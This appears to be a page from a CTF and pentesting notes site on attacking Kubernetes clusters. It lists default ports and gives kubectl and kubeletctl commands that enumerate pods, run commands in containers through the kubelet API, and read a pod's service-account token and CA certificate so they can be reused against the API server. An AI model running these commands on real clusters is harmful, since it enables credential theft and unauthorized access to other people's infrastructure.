TryhackmeHackthebox

Kubernetes

00. Basic

  • Default ports

Port Range
Purpose
Used By

6443

Kubernetes API server

All

2379-2380

etcd server client API

kube-apiserver, etcd

10250

Kubelet API

Self, Control plane

10259

kube-scheduler

Self

10257

kube-controller-manager

Self

10250

Kubelet API

Self, Control plane

30000-32767

NodePort Services

All

  • kubectl

## ------------------| Basic Infomations
kubectl --server <IP> get pod
kubectl --server <IP> cluster-info
kubectl --server <IP> get namespaces
kubectl --server <IP> auth can-i --list
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
## ------------------| list all the pods on the node
kubeletctl pods -s <IP>

## ------------------| list all the running pods
kubeletctl runningpods -s <IP>
kubeletctl runningpods -s <IP> | jq -c '.items[].metadata | [.name, .namespace]'
## Check what's not in the kube-system namespace

## ------------------| Execute commands
kubeletctl -s <IP> exec "id" -p <PodName> -c <ContainerName>

## ------------------| Auth to Kubernetes API
# /run/secrets/kubernetes.io/serviceaccount
# /var/run/secrets/kubernetes.io/serviceaccount
# /secrets/kubernetes.io/serviceaccout
kubeletctl -s <IP> exec "ls /run/secrets/kubernetes.io/serviceaccount" -p <PodName> -c <ContainerName>                                           
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <PodName> -c <ContainerName> | tee ca.crt
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p <PodName> -c <ContainerName> | tee token
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod

  • Create root pod

PreviousAzure ADNextTools

Last updated